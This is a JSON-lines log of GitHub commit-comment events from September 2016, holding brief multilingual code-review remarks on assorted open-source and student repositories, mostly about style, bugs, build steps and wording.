{"id":"4528195226","type":"CommitCommentEvent","actor":{"login":"twatteyne"},"repo":{"name":"openwsn-berkeley/openwsn-sw"},"payload":{"comment":{"id":18929757,"position":null,"line":null,"path":null,"commit_id":"feba1789c69fba31fb84ae266c66dbb25fac0b8c","created_at":"2016-09-07T14:58:45Z","updated_at":"2016-09-07T14:58:45Z","body":"Please start commit message with issue key"}},"created_at":"2016-09-07T14:58:45Z"}
{"id":"4528196128","type":"CommitCommentEvent","actor":{"login":"xdevelnet"},"repo":{"name":"xdevelnet/temp"},"payload":{"comment":{"id":18929758,"position":30,"line":44,"path":"ore_growth_original_utf8.txt","commit_id":"25faeae07b5dc9a1c9aaba9a3eeaa98cfcc40cdf","created_at":"2016-09-07T14:58:53Z","updated_at":"2016-09-07T14:58:53Z","body":"Я так понял тут имелось ввиду \"недель\", т.к. иначе звучит как-то странно или нелогично. Если имеется ввиду обычное уточнение, то, как по мне, следовало бы убрать слово \"несколько\"."}},"created_at":"2016-09-07T14:58:53Z"}
{"id":"4528200284","type":"CommitCommentEvent","actor":{"login":"aakhaled"},"repo":{"name":"medseek-engineering/ccs-model-predictions"},"payload":{"comment":{"id":18929767,"position":5,"line":10,"path":"src/main/python/helper.py","commit_id":"2357947dcbe7b70ecfbb5e7592818a5f8c89fa9b","created_at":"2016-09-07T14:59:29Z","updated_at":"2016-09-07T14:59:29Z","body":"this \"%m_%d_%y_%H:%M:%S\" format has the same problem of uploading in s3! we have to rename again before uploading."}},"created_at":"2016-09-07T14:59:29Z"}
{"id":"4528203372","type":"CommitCommentEvent","actor":{"login":"aakhaled"},"repo":{"name":"medseek-engineering/ccs-model-predictions"},"payload":{"comment":{"id":18929772,"position":10,"line":33,"path":"src/main/python/prediction.py","commit_id":"2357947dcbe7b70ecfbb5e7592818a5f8c89fa9b","created_at":"2016-09-07T14:59:54Z","updated_at":"2016-09-07T14:59:54Z","body":"thanks!"}},"created_at":"2016-09-07T14:59:54Z"}
{"id":"4528210658","type":"CommitCommentEvent","actor":{"login":"threepointone"},"repo":{"name":"threepointone/glamor"},"payload":{"comment":{"id":18929789,"position":5,"line":315,"path":"src/index.js","commit_id":"c771e0605998d7e8c53eb3b881597c02b57e6c57","created_at":"2016-09-07T15:00:57Z","updated_at":"2016-09-07T15:00:57Z","body":"gimme 15 mins, I'll fix. "}},"created_at":"2016-09-07T15:00:57Z"}
{"id":"4528212397","type":"CommitCommentEvent","actor":{"login":"IgnusG"},"repo":{"name":"metjus/Calculator"},"payload":{"comment":{"id":18929792,"position":4,"line":16,"path":"index.html","commit_id":"8d490d985754cc6072ce9533ca04e852e8eebab2","created_at":"2016-09-07T15:01:12Z","updated_at":"2016-09-07T15:01:12Z","body":"There is no file test.js"}},"created_at":"2016-09-07T15:01:12Z"}
{"id":"4528213628","type":"CommitCommentEvent","actor":{"login":"andy11"},"repo":{"name":"mutantmonkey/alpine-appvm"},"payload":{"comment":{"id":18929795,"position":null,"line":null,"path":null,"commit_id":"cf4a48974b79176ca815208c8a9d6e93f159d135","created_at":"2016-09-07T15:01:23Z","updated_at":"2016-09-07T15:01:23Z","body":"Do you have any thoughts about moving from firefox to chromium? \r\n\r\nIt looks like the chromium package is kept up to date -- https://pkgs.alpinelinux.org/package/edge/community/x86_64/chromium"}},"created_at":"2016-09-07T15:01:23Z"}
{"id":"4528215234","type":"CommitCommentEvent","actor":{"login":"seletskiy"},"repo":{"name":"SirVer/ultisnips"},"payload":{"comment":{"id":18929800,"position":null,"line":null,"path":null,"commit_id":"7549874758117f31609550c4fc60fe9497f12068","created_at":"2016-09-07T15:01:36Z","updated_at":"2016-09-07T15:01:36Z","body":"@blueyed: Thx. I do have my own framework for testing vim plugins without docker: https://github.com/reconquest/vim-test.bash\r\n\r\nAnyway, it's UltiSnips is not mine project, so it's legacy code for me."}},"created_at":"2016-09-07T15:01:36Z"}
{"id":"4528216820","type":"CommitCommentEvent","actor":{"login":"Loque-"},"repo":{"name":"torchbox/design-in-browser-bootstrap"},"payload":{"comment":{"id":18929805,"position":null,"line":null,"path":null,"commit_id":"c9e5c99cecc88ae16c3eb193495512f027571f1d","created_at":"2016-09-07T15:01:49Z","updated_at":"2016-09-07T15:01:49Z","body":"Fixes #21 "}},"created_at":"2016-09-07T15:01:49Z"}
{"id":"4528219769","type":"CommitCommentEvent","actor":{"login":"raphspeaks"},"repo":{"name":"ianchute/StockCache"},"payload":{"comment":{"id":18929811,"position":null,"line":null,"path":null,"commit_id":"d9578d677e3baf620cd7a4c95feb9ccbcca0892e","created_at":"2016-09-07T15:02:16Z","updated_at":"2016-09-07T15:02:16Z","body":"Oh, so you are still alive. Good to know..."}},"created_at":"2016-09-07T15:02:16Z"}
{"id":"4528219832","type":"CommitCommentEvent","actor":{"login":"xdevelnet"},"repo":{"name":"xdevelnet/temp"},"payload":{"comment":{"id":18929812,"position":190,"line":332,"path":"ore_growth_original_utf8.txt","commit_id":"25faeae07b5dc9a1c9aaba9a3eeaa98cfcc40cdf","created_at":"2016-09-07T15:02:17Z","updated_at":"2016-09-07T15:02:17Z","body":"Ооокей. После того как я посмотрел оригинал, я могу лишь развести руками. Хз как переписать такую формалистически-вычурно-надменную речь."}},"created_at":"2016-09-07T15:02:17Z"}
{"id":"4528220158","type":"CommitCommentEvent","actor":{"login":"mflorea"},"repo":{"name":"xwiki/jodconverter"},"payload":{"comment":{"id":18929814,"position":null,"line":null,"path":null,"commit_id":"5a02e1d4054836347fadee7f43cf44e5bb4ed9a3","created_at":"2016-09-07T15:02:20Z","updated_at":"2016-09-07T15:02:20Z","body":"That would go in the root of the GitHub repo. Here I just updated the README for the ``jodconverter-core`` module."}},"created_at":"2016-09-07T15:02:20Z"}
{"id":"4528221186","type":"CommitCommentEvent","actor":{"login":"shulard"},"repo":{"name":"shulard/atoum-xml-extension"},"payload":{"comment":{"id":18929817,"position":11,"line":110,"path":"classes/asserters/nodes.php","commit_id":"ef0c35c6091aa6f85b27d1bb1ca7e6182f9aafbf","created_at":"2016-09-07T15:02:28Z","updated_at":"2016-09-07T15:02:28Z","body":"I think I misunderstand at first read, I though that there was that feature integrated in atoum by default... 😄"}},"created_at":"2016-09-07T15:02:28Z"}
{"id":"4528223644","type":"CommitCommentEvent","actor":{"login":"Safihre"},"repo":{"name":"sabnzbd/sabnzbd"},"payload":{"comment":{"id":18929822,"position":null,"line":null,"path":null,"commit_id":"748ca0ea27c973948c6985a3ea5bb621a56306a2","created_at":"2016-09-07T15:02:49Z","updated_at":"2016-09-07T15:02:49Z","body":"@Taloth @markus101 SABnzb's pre-check won't change the ID of a job anymore after the check. \r\nWe didn't know this was a problem really, but now I understand why Sonarr gives that warning when a user has it enabled and tries to add SABnzbd as a downloader 🐹 \r\nThis will be in SABnzbd 1.1.0 Final, which we hope to release within a week or so."}},"created_at":"2016-09-07T15:02:49Z"}
{"id":"4528226286","type":"CommitCommentEvent","actor":{"login":"jnorkus"},"repo":{"name":"clickataxi/dd-ui"},"payload":{"comment":{"id":18929827,"position":3,"line":1,"path":"src/data-list/docs/readme.md","commit_id":"fff7324b8feba32ed83a9d70df8e06675bbef726","created_at":"2016-09-07T15:03:13Z","updated_at":"2016-09-07T15:03:13Z","body":"there -> where"}},"created_at":"2016-09-07T15:03:13Z"}
{"id":"4528227730","type":"CommitCommentEvent","actor":{"login":"scalderon"},"repo":{"name":"dagyus/Cuentas-Bancarias"},"payload":{"comment":{"id":18929828,"position":17,"line":17,"path":"Main.java","commit_id":"086ab48365ec2dda36268e93589a082e6d79b99a","created_at":"2016-09-07T15:03:26Z","updated_at":"2016-09-07T15:03:26Z","body":"Acá te conviene declararla con la interfaz List, para ser más flexibles."}},"created_at":"2016-09-07T15:03:26Z"}
{"id":"4528229690","type":"CommitCommentEvent","actor":{"login":"darealshinji"},"repo":{"name":"woodruffw/screenfetch-c"},"payload":{"comment":{"id":18929835,"position":13,"line":62,"path":"src/disp.c","commit_id":"6c6bd58ae843ee9bf782a7152db7a5d30e41719d","created_at":"2016-09-07T15:03:42Z","updated_at":"2016-09-07T15:03:42Z","body":"If I'm not mistaken this should either be `i < DETECTED_ARR_LEN` or `i <= DETECTED_ARR_LEN-1` (with `DETECTED_ARR_LEN` defined as 17)."}},"created_at":"2016-09-07T15:03:42Z"}
{"id":"4528232142","type":"CommitCommentEvent","actor":{"login":"bishoyawadalla"},"repo":{"name":"bishoyawadalla/test"},"payload":{"comment":{"id":18929840,"position":null,"line":null,"path":null,"commit_id":"69eb0b0cb70535e6b8dabf2d4884a05cf9d623c9","created_at":"2016-09-07T15:04:04Z","updated_at":"2016-09-07T15:04:04Z","body":"yo"}},"created_at":"2016-09-07T15:04:04Z"}
{"id":"4528233205","type":"CommitCommentEvent","actor":{"login":"darealshinji"},"repo":{"name":"woodruffw/screenfetch-c"},"payload":{"comment":{"id":18929845,"position":6,"line":18,"path":"src/plat/win32/detect.c","commit_id":"6c6bd58ae843ee9bf782a7152db7a5d30e41719d","created_at":"2016-09-07T15:04:15Z","updated_at":"2016-09-07T15:04:15Z","body":"POSIX"}},"created_at":"2016-09-07T15:04:15Z"}
{"id":"4528235503","type":"CommitCommentEvent","actor":{"login":"stnava"},"repo":{"name":"stnava/ANTsR"},"payload":{"comment":{"id":18929851,"position":null,"line":null,"path":null,"commit_id":"44fe19e4c43a4c5cf7af734405597ff85f7c365b","created_at":"2016-09-07T15:04:33Z","updated_at":"2016-09-07T15:04:33Z","body":"@jeffduda the ease with which this was implemented really made me appreciate the iterator & multichannel work that you did - it's fast and clean.  i did not test this extensively but it seems to work well."}},"created_at":"2016-09-07T15:04:33Z"}
{"id":"4528239650","type":"CommitCommentEvent","actor":{"login":"scalderon"},"repo":{"name":"dagyus/Cuentas-Bancarias"},"payload":{"comment":{"id":18929862,"position":58,"line":58,"path":"Main.java","commit_id":"086ab48365ec2dda36268e93589a082e6d79b99a","created_at":"2016-09-07T15:05:11Z","updated_at":"2016-09-07T15:05:11Z","body":"Esta inicialización no es necesaria porque después llamás al constructor de Cuenta."}},"created_at":"2016-09-07T15:05:11Z"}
{"id":"4528240152","type":"CommitCommentEvent","actor":{"login":"threepointone"},"repo":{"name":"threepointone/glamor"},"payload":{"comment":{"id":18929865,"position":5,"line":315,"path":"src/index.js","commit_id":"c771e0605998d7e8c53eb3b881597c02b57e6c57","created_at":"2016-09-07T15:05:15Z","updated_at":"2016-09-07T15:05:15Z","body":"pubbed 2.15.2 with the fix, thanks for the catch!"}},"created_at":"2016-09-07T15:05:15Z"}
{"id":"4528241712","type":"CommitCommentEvent","actor":{"login":"JimHokanson"},"repo":{"name":"JimHokanson/matlab_standard_library"},"payload":{"comment":{"id":18929870,"position":null,"line":null,"path":null,"commit_id":"7be13d4131b18b35e5f344d5a81f521d3a94a2cf","created_at":"2016-09-07T15:05:28Z","updated_at":"2016-09-07T15:05:28Z","body":"@GregGoldman \r\n\r\nNotes on changes I made to your code:\r\n1) Try and fix indentation, on Windows ctrl-A selects everything in a file and ctrl-I auto-indents. This was done for goDebugHelper.m\r\n2) In sl.ml.editor.openAndGoToLine I changed processing related to the default. By default, your code enabled one pathway (command window focus), but leaving things in the editor was not explicitly supported. It is true that passing in anything besides 'cmd' would have accomplished this, but it is better to have an explicit input.\r\n3) Notice, I added an otherwise clause to the switch statement, ~90% of the time this is desirable.\r\n4) Opening the file in the editor and setting the keyboard focus was a non-blocking call. This meant I added a brief pause to try and ensure it was finished before trying to switch the keyboard focus to the command window.\r\n5) The grabFocus call in the helper was made redundant by the call to sl.ml.editor.openAndGoToLine, I removed it.\r\n6) Adding non-default behavior to a call (i.e. switching focus to the command window in openAndGoToLine) is a gutsy call. Since the behavior of the keyboard focus is not well defined for the native Matlab functionality, I think it is probably ok. The alternative would be to make going to the editor the default, and then passing in 'focus','cmd' into the function call being made from goDebugHelper.m\r\n7) I'm not sure what you meant by the mex not being able to see goDebugHelper, it worked for me ... "}},"created_at":"2016-09-07T15:05:28Z"}
{"id":"4528243330","type":"CommitCommentEvent","actor":{"login":"darealshinji"},"repo":{"name":"woodruffw/screenfetch-c"},"payload":{"comment":{"id":18929876,"position":12,"line":24,"path":"src/plat/win32/detect.c","commit_id":"6c6bd58ae843ee9bf782a7152db7a5d30e41719d","created_at":"2016-09-07T15:05:40Z","updated_at":"2016-09-07T15:05:40Z","body":"Windows' native version of `gethostname`. Binary must be linked against `-lws2_32`."}},"created_at":"2016-09-07T15:05:40Z"}
{"id":"4528243788","type":"CommitCommentEvent","actor":{"login":"thomasfillon"},"repo":{"name":"Parisson/TimeSide"},"payload":{"comment":{"id":18929877,"position":null,"line":null,"path":null,"commit_id":"2f9dfa3a31a2d9da78b32aa48827e09f82bfc052","created_at":"2016-09-07T15:05:43Z","updated_at":"2016-09-07T15:05:43Z","body":"@quematech \r\nHi Eric !  I got some encoding issue. Does this commit seems fine to you ? "}},"created_at":"2016-09-07T15:05:43Z"}
{"id":"4528251697","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":18929901,"position":23,"line":23,"path":"band-service/src/main/java/hu/schonherz/training/band/service/impl/BandImageImpl.java","commit_id":"eb63c9e3bebad45f634ddfd61b1f1c2bdfea076e","created_at":"2016-09-07T15:06:54Z","updated_at":"2016-09-07T15:06:54Z","body":"Transaction should be managed by the container.\r\n`TransactionManagementType.BEAN` means that this EJB explicitly manages its own transactions (= you, as a developer have to ensure it)."}},"created_at":"2016-09-07T15:06:54Z"}
{"id":"4528252926","type":"CommitCommentEvent","actor":{"login":"aakhaled"},"repo":{"name":"medseek-engineering/ccs-model-predictions"},"payload":{"comment":{"id":18929904,"position":18,"line":40,"path":"src/main/python/helper.py","commit_id":"2357947dcbe7b70ecfbb5e7592818a5f8c89fa9b","created_at":"2016-09-07T15:07:04Z","updated_at":"2016-09-07T15:07:04Z","body":"it is required since it is replacing for each column! If there is any single column other than 'str', then it will terminate the whole operation. It is just putting a check (in any case, there is a column of type other than 'str'), so that it still runs the loop. checked it on a notebook, and worked perfect!"}},"created_at":"2016-09-07T15:07:04Z"}
{"id":"4528257135","type":"CommitCommentEvent","actor":{"login":"vutran"},"repo":{"name":"threepointone/glamor"},"payload":{"comment":{"id":18929924,"position":null,"line":null,"path":null,"commit_id":"304e5187917b171b795044a65c723df607a59085","created_at":"2016-09-07T15:07:40Z","updated_at":"2016-09-07T15:07:40Z","body":"👍  Was about to shim this myself."}},"created_at":"2016-09-07T15:07:40Z"}
{"id":"4528257895","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":18929926,"position":29,"line":29,"path":"band-service/src/main/java/hu/schonherz/training/band/service/impl/BandImageImpl.java","commit_id":"eb63c9e3bebad45f634ddfd61b1f1c2bdfea076e","created_at":"2016-09-07T15:07:47Z","updated_at":"2016-09-07T15:07:47Z","body":"Dependencies should be private."}},"created_at":"2016-09-07T15:07:47Z"}
{"id":"4528262223","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":18929935,"position":16,"line":16,"path":"band-service/src/main/java/hu/schonherz/training/band/service/mapper/BandImageMapper.java","commit_id":"eb63c9e3bebad45f634ddfd61b1f1c2bdfea076e","created_at":"2016-09-07T15:08:25Z","updated_at":"2016-09-07T15:08:25Z","body":"Utility class should be final."}},"created_at":"2016-09-07T15:08:25Z"}
{"id":"4528263854","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":18929936,"position":20,"line":20,"path":"band-service/src/main/java/hu/schonherz/training/band/service/mapper/BandImageMapper.java","commit_id":"eb63c9e3bebad45f634ddfd61b1f1c2bdfea076e","created_at":"2016-09-07T15:08:39Z","updated_at":"2016-09-07T15:08:39Z","body":"Utility class constructors should be private."}},"created_at":"2016-09-07T15:08:39Z"}
{"id":"4528264094","type":"CommitCommentEvent","actor":{"login":"thomasfillon"},"repo":{"name":"Parisson/TimeSide"},"payload":{"comment":{"id":18929937,"position":null,"line":null,"path":null,"commit_id":"c90e7bcfbc81ebfe4bdb4aa8df3ea7a7aed0614f","created_at":"2016-09-07T15:08:41Z","updated_at":"2016-09-07T15:08:41Z","body":"@mrousselet @quematech \r\n\r\nHi Mayeul,\r\n\r\nI set up a container to do the setup for your code:\r\n- npm install\r\n- bower install\r\n- grunt build \r\n\r\nUsage: `docker-compose -f docker-compose.yml -f env/build.yml -f env/debug.yml -f env/dev.yml -f env/js_build.yml run js_build`  \r\n\r\nDoes it seems ok to you ?"}},"created_at":"2016-09-07T15:08:41Z"}
{"id":"4528270589","type":"CommitCommentEvent","actor":{"login":"L00102669"},"repo":{"name":"L00102669/VictorProjGit"},"payload":{"comment":{"id":18929950,"position":null,"line":null,"path":null,"commit_id":"b6dcd2588f7d4bcd7888375eb0805bd9ba8e0878","created_at":"2016-09-07T15:09:37Z","updated_at":"2016-09-07T15:09:37Z","body":"Hi All, \r\nCheck GitHub\r\nJust a quick JavaDoc test to get it working, had some issues with GitHub but i think i've worked them out, test class has author details etc and basic variable changes, nothing major, i had a free half hour so i thought i'd update it :)"}},"created_at":"2016-09-07T15:09:37Z"}
{"id":"4528271674","type":"CommitCommentEvent","actor":{"login":"brian-rickman"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":18929951,"position":112,"line":112,"path":"presto-product-tests/src/main/java/com/facebook/presto/tests/jdbc/LdapTests.java","commit_id":"9eeba7e72715793aa41a1de88a84559ed034b83b","created_at":"2016-09-07T15:09:47Z","updated_at":"2016-09-07T15:09:47Z","body":"I'd prefer not to require that people include -x simba_jdbc on every test run where the Simba drivers are not being used.  I don't expect Facebook to ever run product tests with the Simba driver, but I would like to have these tests merged to master at some point.  If Tempto provided a way for a class to exclude itself from a test run based on it's environment, then we could avoid this kind of thing."}},"created_at":"2016-09-07T15:09:47Z"}
{"id":"4528273597","type":"CommitCommentEvent","actor":{"login":"abigailhils"},"repo":{"name":"abigailhils/hello-world"},"payload":{"comment":{"id":18929955,"position":null,"line":null,"path":null,"commit_id":"3d88173ac8fb2b3daa1bf4ce640ccc81ec0b0705","created_at":"2016-09-07T15:10:04Z","updated_at":"2016-09-07T15:10:04Z","body":"Hello-World-Stay-Awesome"}},"created_at":"2016-09-07T15:10:04Z"}
{"id":"4528273738","type":"CommitCommentEvent","actor":{"login":"Codepixl"},"repo":{"name":"Codepixl/GLCraft"},"payload":{"comment":{"id":18929956,"position":null,"line":null,"path":null,"commit_id":"cf9be5f167c092fcf867af56a37e2a51b417ae38","created_at":"2016-09-07T15:10:06Z","updated_at":"2016-09-07T15:10:06Z","body":"Dirt is called Coal ore, you can just change it to \"Dirt\" and delete the getTextureName method, because it automatically gets the texture name from the name"}},"created_at":"2016-09-07T15:10:06Z"}
{"id":"4528276911","type":"CommitCommentEvent","actor":{"login":"Salonen"},"repo":{"name":"Salonen/IIO11300"},"payload":{"comment":{"id":18929962,"position":null,"line":null,"path":null,"commit_id":"a972ced185151f3a98e8628d81d47fc8886750bc","created_at":"2016-09-07T15:10:33Z","updated_at":"2016-09-07T15:10:33Z","body":"Tässä tehtävä muuten valmis, mutta ei ole vielä grafiikoita."}},"created_at":"2016-09-07T15:10:33Z"}
{"id":"4528279196","type":"CommitCommentEvent","actor":{"login":"okbel"},"repo":{"name":"coralproject/cay"},"payload":{"comment":{"id":18929966,"position":null,"line":null,"path":null,"commit_id":"eb43bffdf5e8d9e1c2806bd49616e568b607be8b","created_at":"2016-09-07T15:10:53Z","updated_at":"2016-09-07T15:10:53Z","body":"💯 "}},"created_at":"2016-09-07T15:10:53Z"}
{"id":"4528281042","type":"CommitCommentEvent","actor":{"login":"Monkeyboy2805"},"repo":{"name":"qrush/travis-ci"},"payload":{"comment":{"id":18929970,"position":null,"line":null,"path":null,"commit_id":"75255af0eba12202148cd999cf4fb350738d8a95","created_at":"2016-09-07T15:11:13Z","updated_at":"2016-09-07T15:11:13Z","body":"You do know your miles behind actual travis?"}},"created_at":"2016-09-07T15:11:13Z"}
{"id":"4528282323","type":"CommitCommentEvent","actor":{"login":"brian-rickman"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":18929973,"position":127,"line":127,"path":"presto-product-tests/src/main/java/com/facebook/presto/tests/jdbc/LdapTests.java","commit_id":"9eeba7e72715793aa41a1de88a84559ed034b83b","created_at":"2016-09-07T15:11:23Z","updated_at":"2016-09-07T15:11:23Z","body":"done"}},"created_at":"2016-09-07T15:11:23Z"}
{"id":"4528282805","type":"CommitCommentEvent","actor":{"login":"sedwards2009"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18929975,"position":103,"line":101,"path":"plugins/CuraProfileReader/CuraProfileReader.py","commit_id":"86369ce1da14b91deb28ddc32d8cbdc1aab28b96","created_at":"2016-09-07T15:11:27Z","updated_at":"2016-09-07T15:11:27Z","body":"True, I made a note of this in JIRA (hidden in the 'Analysis'). ;-)\r\n\r\nThe upgrade system really needs some architecture work first though."}},"created_at":"2016-09-07T15:11:27Z"}
{"id":"4528290897","type":"CommitCommentEvent","actor":{"login":"Monkeyboy2805"},"repo":{"name":"qrush/travis-ci"},"payload":{"comment":{"id":18929993,"position":null,"line":null,"path":null,"commit_id":"75255af0eba12202148cd999cf4fb350738d8a95","created_at":"2016-09-07T15:12:38Z","updated_at":"2016-09-07T15:12:38Z","body":"also, I don't think its very professional to put swearing in your commits in the first place whoever it was"}},"created_at":"2016-09-07T15:12:38Z"}
{"id":"4528291821","type":"CommitCommentEvent","actor":{"login":"lukaszunity"},"repo":{"name":"Unity-Technologies/mono"},"payload":{"comment":{"id":18929995,"position":null,"line":null,"path":null,"commit_id":"402310c0c97f31ada040b1161e4e36c943a71818","created_at":"2016-09-07T15:12:48Z","updated_at":"2016-09-07T15:12:48Z","body":"A thumb up for both of you 👍 👍 "}},"created_at":"2016-09-07T15:12:48Z"}
{"id":"4528292558","type":"CommitCommentEvent","actor":{"login":"ruanyf"},"repo":{"name":"ruanyf/jstutorial"},"payload":{"comment":{"id":18929998,"position":19,"line":457,"path":"grammar/operator.md","commit_id":"ab3ad4cecb67b0165a7ccd3313d6efb292052cd5","created_at":"2016-09-07T15:12:53Z","updated_at":"2016-09-07T15:12:53Z","body":" 查了一下规格，确实是 ToPrimitive(A) == ToNumber(B)"}},"created_at":"2016-09-07T15:12:53Z"}
{"id":"4528295563","type":"CommitCommentEvent","actor":{"login":"brian-rickman"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":18930005,"position":210,"line":210,"path":"presto-product-tests/src/main/java/com/facebook/presto/tests/jdbc/LdapTests.java","commit_id":"9eeba7e72715793aa41a1de88a84559ed034b83b","created_at":"2016-09-07T15:13:20Z","updated_at":"2016-09-07T15:13:20Z","body":"Done"}},"created_at":"2016-09-07T15:13:20Z"}
{"id":"4528298328","type":"CommitCommentEvent","actor":{"login":"Codepixl"},"repo":{"name":"Codepixl/GLCraft"},"payload":{"comment":{"id":18930013,"position":null,"line":null,"path":null,"commit_id":"cf9be5f167c092fcf867af56a37e2a51b417ae38","created_at":"2016-09-07T15:13:45Z","updated_at":"2016-09-07T15:13:45Z","body":"Also you can remove the isTransparent and canPassThrough methods because those are false by default"}},"created_at":"2016-09-07T15:13:45Z"}
{"id":"4528298590","type":"CommitCommentEvent","actor":{"login":"tim740"},"repo":{"name":"tim740/skAliases"},"payload":{"comment":{"id":18930015,"position":null,"line":null,"path":null,"commit_id":"15a369944fe8c9892f73216456e3176ee9cca358","created_at":"2016-09-07T15:13:47Z","updated_at":"2016-09-07T15:13:47Z","body":"im going to add those today i was so busy yesterday i forgot to\r\nill release a update later today\r\n"}},"created_at":"2016-09-07T15:13:47Z"}
{"id":"4528304000","type":"CommitCommentEvent","actor":{"login":"brian-rickman"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":18930027,"position":254,"line":254,"path":"presto-product-tests/src/main/java/com/facebook/presto/tests/jdbc/LdapTests.java","commit_id":"9eeba7e72715793aa41a1de88a84559ed034b83b","created_at":"2016-09-07T15:14:37Z","updated_at":"2016-09-07T15:14:37Z","body":"done"}},"created_at":"2016-09-07T15:14:37Z"}
{"id":"4528305105","type":"CommitCommentEvent","actor":{"login":"zimmerml"},"repo":{"name":"OpenTOSCA/container"},"payload":{"comment":{"id":18930029,"position":null,"line":null,"path":null,"commit_id":"b178ca0f88ae64ddeb1f73c30e5d5a6bc8213f76","created_at":"2016-09-07T15:14:47Z","updated_at":"2016-09-07T15:14:47Z","body":"Thanks for your feedback.\r\nWe further improved the matching of messageIDs in ee0579b007cc0e1d5cbfee88f5aa9a0d7d151674"}},"created_at":"2016-09-07T15:14:47Z"}
{"id":"4528311277","type":"CommitCommentEvent","actor":{"login":"brian-rickman"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":18930045,"position":264,"line":264,"path":"presto-product-tests/src/main/java/com/facebook/presto/tests/jdbc/LdapTests.java","commit_id":"9eeba7e72715793aa41a1de88a84559ed034b83b","created_at":"2016-09-07T15:15:44Z","updated_at":"2016-09-07T15:15:44Z","body":"done"}},"created_at":"2016-09-07T15:15:44Z"}
{"id":"4528317614","type":"CommitCommentEvent","actor":{"login":"KristopherWagner"},"repo":{"name":"alberto-acevedo/cesium-navigation"},"payload":{"comment":{"id":18930059,"position":null,"line":null,"path":null,"commit_id":"e87c66ceafb4971b4f491d803bd84ce3a026ae95","created_at":"2016-09-07T15:16:40Z","updated_at":"2016-09-07T15:16:40Z","body":"The disableCompass feature completely hides the compass; out of curiosity is there anyway to disable the compass controls (clicking and dragging it) without hiding the compass itself?"}},"created_at":"2016-09-07T15:16:40Z"}
{"id":"4528326901","type":"CommitCommentEvent","actor":{"login":"JikkuJose"},"repo":{"name":"amalshehu/exercism-python"},"payload":{"comment":{"id":18930081,"position":null,"line":null,"path":null,"commit_id":"822a14dd313c643a057c161912d7b2f01377c839","created_at":"2016-09-07T15:18:04Z","updated_at":"2016-09-07T15:18:04Z","body":"Try to be conscious about how you write commit messages. Have noticed you mixing styles, try to stick with this:\r\n\r\n[Past tense denoting action] [item(s) the action applied on]\r\n\r\nEg:\r\n\r\n`Add cipher dictionary` instead of `cipher dictionary added`.\r\n\r\nNote: I didn't you the word _generated_ as the method you wrote wasn't _generated_."}},"created_at":"2016-09-07T15:18:04Z"}
{"id":"4528328418","type":"CommitCommentEvent","actor":{"login":"swethavennapusa"},"repo":{"name":"swethavennapusa/LittleChallengers"},"payload":{"comment":{"id":18930084,"position":null,"line":null,"path":null,"commit_id":"1a05e45cfc23d689a317cabe9fe56897b9cb65a4","created_at":"2016-09-07T15:18:18Z","updated_at":"2016-09-07T15:18:18Z","body":"hi children"}},"created_at":"2016-09-07T15:18:18Z"}
{"id":"4528329598","type":"CommitCommentEvent","actor":{"login":"swethavennapusa"},"repo":{"name":"swethavennapusa/LittleChallengers"},"payload":{"comment":{"id":18930086,"position":null,"line":null,"path":null,"commit_id":"1a05e45cfc23d689a317cabe9fe56897b9cb65a4","created_at":"2016-09-07T15:18:27Z","updated_at":"2016-09-07T15:18:27Z","body":"hi"}},"created_at":"2016-09-07T15:18:27Z"}
{"id":"4528330166","type":"CommitCommentEvent","actor":{"login":"JayKay755"},"repo":{"name":"JayKay755/toUpperCase"},"payload":{"comment":{"id":18930089,"position":14,"line":14,"path":"README.md","commit_id":"6ba8d2ca8eccded9eda405e39a0a5bb3dc8906e0","created_at":"2016-09-07T15:18:32Z","updated_at":"2016-09-07T15:18:32Z","body":"преобразование string в массив char"}},"created_at":"2016-09-07T15:18:32Z"}
{"id":"4528337389","type":"CommitCommentEvent","actor":{"login":"cavis"},"repo":{"name":"PRX/publish.prx.org"},"payload":{"comment":{"id":18930105,"position":5,"line":6,"path":"env-example","commit_id":"7ca590f623266a6de294c714aafcffe0116ea9ee","created_at":"2016-09-07T15:19:38Z","updated_at":"2016-09-07T15:19:38Z","body":"Whoops!  Operator error."}},"created_at":"2016-09-07T15:19:38Z"}
{"id":"4528337740","type":"CommitCommentEvent","actor":{"login":"PlekhanovA"},"repo":{"name":"xdevelnet/temp"},"payload":{"comment":{"id":18930107,"position":30,"line":44,"path":"ore_growth_original_utf8.txt","commit_id":"25faeae07b5dc9a1c9aaba9a3eeaa98cfcc40cdf","created_at":"2016-09-07T15:19:41Z","updated_at":"2016-09-07T15:19:41Z","body":"Там должно быть \"несколько раз\". Просто пропустил слово."}},"created_at":"2016-09-07T15:19:41Z"}
{"id":"4528342100","type":"CommitCommentEvent","actor":{"login":"HKK13"},"repo":{"name":"sourcebot/sourcebot"},"payload":{"comment":{"id":18930122,"position":null,"line":null,"path":null,"commit_id":"61d23733e9bd979b586412d8901d728a1d0e90a8","created_at":"2016-09-07T15:20:23Z","updated_at":"2016-09-07T15:20:23Z","body":"#10 "}},"created_at":"2016-09-07T15:20:23Z"}
{"id":"4528343696","type":"CommitCommentEvent","actor":{"login":"Gomez"},"repo":{"name":"starzel/starzel.snippets"},"payload":{"comment":{"id":18930125,"position":108,"line":187,"path":"src/starzel/snippets/browser/resources/snippets.js","commit_id":"deb73af8e166a2f651336e5892466b0ea04630af","created_at":"2016-09-07T15:20:35Z","updated_at":"2016-09-07T15:20:35Z","body":"Will remove it ;)"}},"created_at":"2016-09-07T15:20:35Z"}
